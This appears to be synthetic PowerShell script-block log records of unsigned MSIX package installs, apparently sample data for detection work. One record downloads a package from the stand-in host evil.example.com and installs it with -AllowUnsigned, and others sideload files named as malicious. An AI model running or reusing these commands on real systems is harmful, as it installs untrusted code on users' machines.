4104152150x0123456Microsoft-Windows-PowerShell/OperationalDESKTOP-ABC123.contoso.local11Add-AppPackage -Path "C:\Users\User\Downloads\MaliciousApp_1.0.0.0_x64.msix" -AllowUnsigned -Verbosea1b2c3d4-e5f6-7890-1234-567890abcdefC:\Users\User\Documents\Install-Package.ps1
4104152150x0123457Microsoft-Windows-PowerShell/OperationalDESKTOP-ABC123.contoso.local11$packagePath = "C:\Users\User\Downloads\FakeInstaller_2.0.0.0_x86.msix"
Write-Host "Installing package: $packagePath"
Add-AppxPackage -Path $packagePath -AllowUnsigned -ForceUpdateFromAnyVersion -ForceApplicationShutdownb2c3d4e5-f6a7-8901-2345-67890abcdef1C:\Users\User\AppData\Local\Temp\install_package.ps1
4104152150x0123458Microsoft-Windows-PowerShell/OperationalDESKTOP-DEF456.contoso.local11function Install-MaliciousPackage {
param (
[string]$PackagePath,
[switch]$Force
)
try {
Write-Host "Installing package from $PackagePath"
Add-AppPackage -Path $PackagePath -AllowUnsigned -DependencyPath "C:\Users\Admin\Downloads\Dependencies" -ErrorAction Stop
Write-Host "Package installed successfully"
} catch {
Write-Error "Failed to install package: $_"
}
}
# Download and install package
$packageUrl = "http://evil.example.com/MaliciousToolkit_3.0.0.0_x64.msix"
$downloadPath = "$env:TEMP\package.msix"
Invoke-WebRequest -Uri $packageUrl -OutFile $downloadPath
Install-MaliciousPackage -PackagePath $downloadPath -Forcec3d4e5f6-a7b8-9012-3456-7890abcdef1C:\Users\Admin\Downloads\setup.ps1